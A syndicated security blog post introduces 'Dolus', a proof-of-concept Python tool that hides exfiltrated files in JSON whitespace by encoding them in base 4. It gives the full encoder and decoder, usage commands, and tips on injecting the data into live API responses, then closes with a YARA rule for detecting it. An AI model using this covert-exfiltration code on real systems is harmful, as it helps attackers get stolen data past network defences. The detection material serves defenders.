
Covert Data Exfiltration via JSON in an API
I’ve been thinking a lot lately about methods for covert data exfiltration when hacking APIs.
These days, API gateways, web application firewalls (WAFs), and even intrusion detection systems (IDS) have wised up to secondary data streams leaving API servers. It’s not uncommon to find security controls blocking everything except the API requests and responses themselves.
Is there any way for us to hide data in plain sight within those responses?
It turns out there is.
You can smuggle data directly in the JSON payloads, if you know what you’re doing.
Let me show you how.
Understanding the grammar of JSON
If you look closely at RFC 8259, which defines the grammar of JSON, you will notice that several characters are considered “insignificant whitespace.” They may appear before or after any of JSON’s structural characters (and around the top-level value), and parsers simply discard them.
These are the space, horizontal tab, line feed, and carriage return:
```
ws = *(
        %x20 /              ; Space
        %x09 /              ; Horizontal tab
        %x0A /              ; Line feed or New line
        %x0D )              ; Carriage return
```
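A quick way to see this grammar in action is Python’s standard json module, which treats exactly these four characters as whitespace between tokens. The sketch below pads a tiny document with a given character, inside and around the object, and checks whether it still parses. The helper name `parses_with_padding` is just for illustration. A vertical tab or a no-break space, neither of which is JSON whitespace, is rejected.

```python
import json

# The four "insignificant whitespace" characters from RFC 8259.
JSON_WS = [" ", "\t", "\n", "\r"]


def parses_with_padding(char: str) -> bool:
    """Illustrative helper: does {"Hello": "World"} still parse when the
    given character is placed around the object and between its tokens?"""
    doc = f'{char}{{{char}"Hello"{char}:{char}"World"{char}}}{char}'
    try:
        return json.loads(doc) == {"Hello": "World"}
    except json.JSONDecodeError:
        return False


for ch in JSON_WS:
    print(repr(ch), parses_with_padding(ch))      # True for all four

print(repr("\x0b"), parses_with_padding("\x0b"))  # vertical tab: False
print(repr("\xa0"), parses_with_padding("\xa0"))  # no-break space: False
```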
Because parsers discard this whitespace, we can use it to encode arbitrary data we want to exfiltrate. Better still, a human will probably not notice it, since it’s practically invisible to the naked eye.
Let me show you what I mean.
Consider two JSON files named input.json and output.json. If we cat them out and pipe them into jq, we can see that both parse cleanly to the same key/value pair of Hello/World.

However, the files differ considerably in size. That’s because output.json has a binary file embedded in it, encoded using this “insignificant whitespace.”
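You can reproduce the effect without Dolus. The sketch below uses a made-up padding string built from the four whitespace bytes as a stand-in for a real embedded file: both documents decode to the same object, yet their byte lengths differ by exactly the amount of padding.

```python
import json

# Minified cover document, like input.json in the example above.
plain = b'{"Hello":"World"}'

# Stand-in for an embedded payload: 1,000 repetitions of the four
# insignificant-whitespace bytes appended after the top-level value.
padding = b"\r\n\t " * 1000
padded = plain + padding

# Both documents decode to the same object...
assert json.loads(plain) == json.loads(padded) == {"Hello": "World"}

# ...but the padded one is 4,000 bytes larger.
print(len(plain), len(padded))  # 17 4017
```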

How? With a proof-of-concept (PoC) Python script I wrote called Dolus.
WTF is Dolus?
Dolus was a figure in Greek mythology associated with trickery, deception, and cunning.
He was considered a personification of deceit and was often depicted as a companion or servant of the god Hermes, who was also known for his cunning and trickery. Dolus was sometimes portrayed as a figure who could create false appearances and lead people astray, embodying the concept of deliberate mischief and guile.
That seemed like the perfect name for a script that would let us abuse the JSON payloads in an API to exfiltrate data. A bit of cunning. A bit of deception. And a whole lot of luck.
The cunning bit of code
You know how the BASE2 numeral system represents binary values using only the digits 0 and 1? And how BASE16 represents hexadecimal values using 16 symbols, 0-9 and A-F?
Dolus works the same way, encoding binary data in a custom BASE4 numeral system.
Its four digits are the four whitespace characters that the JSON RFC treats as insignificant: horizontal tab (\t), line feed (\n), carriage return (\r), and space ( ), which represent the values 0, 1, 2, and 3, respectively.
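To make the mapping concrete, here is the arithmetic for a single byte. The letter A is 0x41, or 65 in decimal, and 65 = 1·4³ + 0·4² + 0·4¹ + 1·4⁰, so its base-4 digits are 1001. The sketch below performs that repeated division by 4 and swaps each digit for its whitespace byte, padding to the eight digits per byte that the Dolus code in this post uses. The function name `byte_to_symbols` is hypothetical.

```python
# Digit value -> whitespace byte, in the order Dolus uses:
# 0 = tab, 1 = line feed, 2 = carriage return, 3 = space.
SYMBOLS = [0x09, 0x0A, 0x0D, 0x20]


def byte_to_symbols(value: int, width: int = 8) -> bytes:
    """Hypothetical helper: write one byte as `width` base-4 digits
    (most significant first) and map each digit to its whitespace byte."""
    digits = []
    for _ in range(width):
        value, remainder = divmod(value, 4)
        digits.append(SYMBOLS[remainder])
    return bytes(reversed(digits))


encoded = byte_to_symbols(ord("A"))  # 0x41 == 65 == 1001 in base 4
print(encoded)  # b'\t\t\t\t\n\t\t\n'
```

Because a byte never needs more than four base-4 digits, the first four symbols of every eight-symbol group are always tabs.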
I can then use that to convert bytes of data to and from BASE4.
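```python
# Dolus BASE4 alphabet: the four JSON "insignificant whitespace" bytes.
# Position in this list = digit value: tab=0, LF=1, CR=2, space=3.
SYMBOLS = [0x09, 0x0a, 0x0d, 0x20]


def get_index(symbol):
    """Return the BASE4 digit value (0-3) for a whitespace byte."""
    try:
        return SYMBOLS.index(symbol)
    except ValueError:
        raise ValueError(f"Symbol {symbol} not found in SYMBOLS") from None


def bytes_to_base4(input_bytes) -> bytes:
    """Encode each input byte as 8 whitespace symbols, most significant first.

    A byte only needs 4 base-4 digits, so the first 4 symbols of every
    group are always SYMBOLS[0] (tab).
    """
    base4_string_buffer = []
    for byte in input_bytes:
        quotient = byte
        base4_digits = [0] * 8
        # Fill digits from least significant (index 7) to most significant (index 0).
        for j in range(7, -1, -1):
            base4_digits[j] = SYMBOLS[quotient % 4]
            quotient //= 4
        base4_string_buffer.extend(base4_digits)
    return bytes(base4_string_buffer)


def base4_to_bytes(base4_string_buffer) -> bytes:
    """Decode groups of 8 whitespace symbols back into bytes."""
    size_base4_string_buffer = len(base4_string_buffer)
    n = size_base4_string_buffer // 8  # a trailing partial group is ignored
    byte_string_buffer = bytearray(n)
    for i in range(n):
        byte = 0
        for j in range(8):
            # Shift in one 2-bit digit at a time.
            byte = (byte << 2) | get_index(base4_string_buffer[i * 8 + j])
        byte_string_buffer[i] = byte
    return bytes(byte_string_buffer)
```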
The deception bit of code
Once the bytes we want to exfiltrate are converted into the custom BASE4 format, we can embed them in the JSON payload. I did this by appending a special sequence of characters, which I call a “demark sequence,” to the end of the JSON so I know exactly where my exfil data starts. Everything after it is BASE4 data that I can easily parse out.
Here is what the encoding and decoding look like:
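```python
import sys

# DEMARK sequence: marks where the hidden BASE4 data begins (CR, LF, tab, space).
DEMARK = b'\x0d\x0a\x09\x20'


def read_file_to_bytes(path) -> bytes:
    # Assumed helper: read a whole file as raw bytes.
    with open(path, 'rb') as file:
        return file.read()


def get_bytes_after_marker(data: bytes, marker: bytes) -> bytes:
    """Return everything after the first occurrence of marker, or b'' if absent."""
    index = data.find(marker)
    if index != -1:
        return data[index + len(marker):]
    return bytes()


def encode(input_file, output_file, exfil_file):
    """Append DEMARK plus the BASE4-encoded exfil file to the end of a JSON file."""
    exfil_data = read_file_to_bytes(exfil_file)
    encoded_bytes = bytes_to_base4(exfil_data)
    file_content = read_file_to_bytes(input_file)
    # Trailing whitespace after the top-level value is still valid JSON.
    encoded_content = file_content + DEMARK + encoded_bytes
    with open(output_file, 'wb') as file:
        file.write(encoded_content)


def decode(input_file, output_file):
    """Extract the BASE4 data after DEMARK and write the decoded bytes out."""
    encoded_data = read_file_to_bytes(input_file)
    b4_exfil_data = get_bytes_after_marker(encoded_data, DEMARK)
    if not b4_exfil_data:
        print("Hidden data marker not found. Aborting")
        sys.exit(-1)
    exfil_data = base4_to_bytes(b4_exfil_data)
    with open(output_file, 'wb') as file:
        file.write(exfil_data)
```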
Using Dolus to exfiltrate data in JSON
The basic usage for Dolus is as follows:
Encoding: ./dolus.py -i input.json -o output.json -x file.bin -e
Decoding: ./dolus.py -i output.json -o file.bin -d
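How dolus.py parses these flags isn’t shown here. As a minimal sketch, assuming Python’s standard argparse module, the flags above could be wired up as follows; the destination names and help text are hypothetical, and the calls into encode/decode are left out.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    # Hypothetical reconstruction of the command line shown above.
    parser = argparse.ArgumentParser(description="Hide or recover data in JSON whitespace")
    parser.add_argument("-i", dest="input_file", required=True, help="input JSON file")
    parser.add_argument("-o", dest="output_file", required=True, help="output file")
    parser.add_argument("-x", dest="exfil_file", help="file to embed (encode mode)")
    # Exactly one of -e (encode) or -d (decode) must be given.
    mode = parser.add_mutually_exclusive_group(required=True)
    mode.add_argument("-e", dest="encode", action="store_true", help="encode mode")
    mode.add_argument("-d", dest="decode", action="store_true", help="decode mode")
    return parser


args = build_parser().parse_args(["-i", "output.json", "-o", "file.bin", "-d"])
print(args.decode, args.input_file, args.output_file)  # True output.json file.bin
```

A real script would also need to reject -e without -x, for example with `parser.error(...)`.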
Of course, you probably won’t be moving JSON around in separate files during an actual engagement. A more realistic approach is to tap the HTTP stream on the web server and inject the data as the JSON payload leaves the server. You can then write your own Burp Suite extension to capture and strip out the exfiltrated data on the fly as it flows through the attack proxy.
As a second example, I’ve used this technique to hide malicious data inside the JSON documents in an Azure Cosmos DB collection. (Don’t ask.)
These are just a couple of ways of using this technique. How you use it is really up to you.
Detecting this exfiltration technique
While most people won’t notice data smuggled in JSON like this, it is detectable.
It’s uncommon to see eight or more “insignificant whitespace” characters in a row in a JSON payload. Stefan Grimminck created a YARA rule that the blue team can use to look for this sort of thing:
```
rule Detect_Hidden_Data_In_Files {
    meta:
        author = "Stefan Grimminck"
        description = "Detects hidden whitespace data in JSON files"
        date = "2024-02-05"
    strings:
        $hidden_data = /[\x20\x09\x0A\x0D]{8,}/
    condition:
        $hidden_data
}
```
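If you want the same check outside YARA, for example in a test harness or a proxy that inspects HTTP response bodies, the rule’s regular expression carries over directly to Python’s re module. This is a minimal sketch: `find_whitespace_runs` is a hypothetical helper, and the threshold of 8 mirrors the rule above. Pretty-printed JSON with deep indentation can also produce runs this long, so the check works best on minified API payloads.

```python
import re

# Same pattern as the YARA rule: 8 or more consecutive space/tab/LF/CR bytes.
HIDDEN_DATA = re.compile(rb"[\x20\x09\x0A\x0D]{8,}")


def find_whitespace_runs(body: bytes) -> list[tuple[int, int]]:
    """Hypothetical helper: return (offset, length) for each suspicious run."""
    return [(m.start(), m.end() - m.start()) for m in HIDDEN_DATA.finditer(body)]


clean = b'{"Hello":"World"}'
# Demark sequence followed by the 8-symbol Dolus encoding of "A".
suspicious = clean + b"\r\n\t " + b"\t\t\t\t\n\t\t\n"

print(find_whitespace_runs(clean))       # []
print(find_whitespace_runs(suspicious))  # [(17, 12)]
```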
Pretty simple. Yet pretty powerful.
Conclusion
Dolus represents a novel approach to covert data exfiltration by exploiting JSON payloads. With API gateways, WAFs, and IDS increasingly vigilant against secondary data streams, embedding data within the JSON payloads offers a stealthy alternative.
This technique has many practical applications, from injecting data into HTTP streams to hiding malicious content in structured and unstructured databases. While this method is powerful, it is not undetectable. Security teams can use YARA rules to identify unusual runs of whitespace characters in HTTP response bodies and detect potential exfiltration.
Dolus is a testament to the blend of technical ingenuity and mythological inspiration. Credit for the foundational idea goes to Stefan Grimminck, whose insights on data smuggling in JSON sparked the development of this tool. For those interested, the latest iteration of the Dolus proof-of-concept code is available for further exploration.
Hack hard!
One last thing…

Have you joined The API Hacker Inner Circle yet? It’s my FREE weekly newsletter where I share articles like this, along with pro tips, industry insights, and community news that I don’t tend to share publicly. If you haven’t, subscribe at https://apihacker.blog.
The post Covert Data Exfiltration via JSON in an API appeared first on Dana Epp's Blog.
*** This is a Security Bloggers Network syndicated blog from Dana Epp's Blog authored by Dana Epp. Read the original post at: https://danaepp.com/covert-data-exfiltration-via-json-in-an-api